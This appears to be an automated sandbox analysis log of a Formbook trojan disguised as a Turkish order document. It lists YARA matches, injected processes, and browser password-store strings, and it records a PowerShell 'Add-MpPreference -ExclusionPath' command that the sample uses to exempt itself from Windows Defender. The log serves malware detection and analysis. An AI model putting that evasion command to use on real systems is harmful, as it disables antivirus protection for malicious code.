            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01741F925_2_01741F92
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01749EB05_2_01749EB0
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_03198B1D12_2_03198B1D
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_0317B62D12_2_0317B62D
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_031796AD12_2_031796AD
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_03181D3D12_2_03181D3D
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_0317B40412_2_0317B404
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_0317B40D12_2_0317B40D
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A403E613_2_03A403E6
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0398E3F013_2_0398E3F0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3A35213_2_03A3A352
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A002C013_2_03A002C0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A2027413_2_03A20274
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A341A213_2_03A341A2
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A401AA13_2_03A401AA
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A381CC13_2_03A381CC
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0397010013_2_03970100
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A1A11813_2_03A1A118
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A0815813_2_03A08158
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A1200013_2_03A12000
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0397C7C013_2_0397C7C0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039A475013_2_039A4750
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0398077013_2_03980770
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0399C6E013_2_0399C6E0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A4059113_2_03A40591
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0398053513_2_03980535
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A2E4F613_2_03A2E4F6
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A2442013_2_03A24420
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3244613_2_03A32446
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A36BD713_2_03A36BD7
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3AB4013_2_03A3AB40
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0397EA8013_2_0397EA80
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A4A9A613_2_03A4A9A6
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039829A013_2_039829A0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0399696213_2_03996962
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039668B813_2_039668B8
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039AE8F013_2_039AE8F0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0398A84013_2_0398A840
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0398284013_2_03982840
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039FEFA013_2_039FEFA0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03972FC813_2_03972FC8
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0398CFE013_2_0398CFE0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A22F3013_2_03A22F30
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039A0F3013_2_039A0F30
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039C2F2813_2_039C2F28
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039F4F4013_2_039F4F40
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03992E9013_2_03992E90
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3CE9313_2_03A3CE93
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3EEDB13_2_03A3EEDB
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3EE2613_2_03A3EE26
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03980E5913_2_03980E59
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03998DBF13_2_03998DBF
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0397ADE013_2_0397ADE0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0398AD0013_2_0398AD00
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A1CD1F13_2_03A1CD1F
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A20CB513_2_03A20CB5
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03970CF213_2_03970CF2
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03980C0013_2_03980C00
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039C739A13_2_039C739A
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3132D13_2_03A3132D
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0396D34C13_2_0396D34C
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039852A013_2_039852A0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A212ED13_2_03A212ED
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0399B2C013_2_0399B2C0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0398B1B013_2_0398B1B0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A4B16B13_2_03A4B16B
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0396F17213_2_0396F172
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B516C13_2_039B516C
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3F0E013_2_03A3F0E0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A370E913_2_03A370E9
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039870C013_2_039870C0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A2F0CC13_2_03A2F0CC
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3F7B013_2_03A3F7B0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A316CC13_2_03A316CC
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039C563013_2_039C5630
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A1D5B013_2_03A1D5B0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A495C313_2_03A495C3
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3757113_2_03A37571
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3F43F13_2_03A3F43F
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0397146013_2_03971460
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0399FB8013_2_0399FB80
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039BDBF913_2_039BDBF9
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039F5BF013_2_039F5BF0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3FB7613_2_03A3FB76
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A21AA313_2_03A21AA3
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A1DAAC13_2_03A1DAAC
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039C5AA013_2_039C5AA0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A2DAC613_2_03A2DAC6
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A37A4613_2_03A37A46
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3FA4913_2_03A3FA49
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039F3A6C13_2_039F3A6C
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A1591013_2_03A15910
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0398995013_2_03989950
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0399B95013_2_0399B950
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039838E013_2_039838E0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039ED80013_2_039ED800
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03981F9213_2_03981F92
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3FFB113_2_03A3FFB1
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03943FD513_2_03943FD5
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03943FD213_2_03943FD2
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3FF0913_2_03A3FF09
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03989EB013_2_03989EB0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0399FDC013_2_0399FDC0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A37D7313_2_03A37D73
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03983D4013_2_03983D40
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A31D5A13_2_03A31D5A
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3FCF213_2_03A3FCF2
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039F9C3213_2_039F9C32
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03241DE013_2_03241DE0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0325A70013_2_0325A700
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0323CFE713_2_0323CFE7
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0323CFF013_2_0323CFF0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0323D21013_2_0323D210
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0323B29013_2_0323B290
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0324392013_2_03243920
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03C9B08813_2_03C9B088
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03C9C01C13_2_03C9C01C
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03C9BB6813_2_03C9BB68
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03C9BC8313_2_03C9BC83
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 039FF290 appears 105 times
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 039B5130 appears 58 times
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 0396B970 appears 280 times
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 039C7E54 appears 110 times
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 039EEA12 appears 86 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: String function: 017AEA12 appears 86 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: String function: 01775130 appears 58 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: String function: 017BF290 appears 105 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: String function: 0172B970 appears 280 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: String function: 01787E54 appears 110 times
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000000.00000002.1354636489.0000000007540000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000000.00000002.1358819440.000000000D530000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000000.00000002.1329890365.0000000002D91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000000.00000002.1328688417.000000000106E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214174481.00000000012AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHUTDOWN.EXEj% vs 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214355002.000000000182D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeBinary or memory string: OriginalFilenamefTTh.exe> vs 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, P5EYD3VTbd1RAsAUnc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, BDhqcm3UeZWT7A9K30.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, BDhqcm3UeZWT7A9K30.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, BDhqcm3UeZWT7A9K30.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, BDhqcm3UeZWT7A9K30.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, BDhqcm3UeZWT7A9K30.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, BDhqcm3UeZWT7A9K30.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, P5EYD3VTbd1RAsAUnc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@10/7@3/1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_plapwhs1.hgt.ps1Jump to behavior
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: shutdown.exe, 0000000D.00000003.2490318394.0000000003485000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2490205187.0000000003464000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2492288234.000000000348F000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2561874080.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2561874080.0000000003485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeReversingLabs: Detection: 28%
            Source: unknownProcess created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"
            Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"Jump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"Jump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: uxtheme.dllJump to behavior
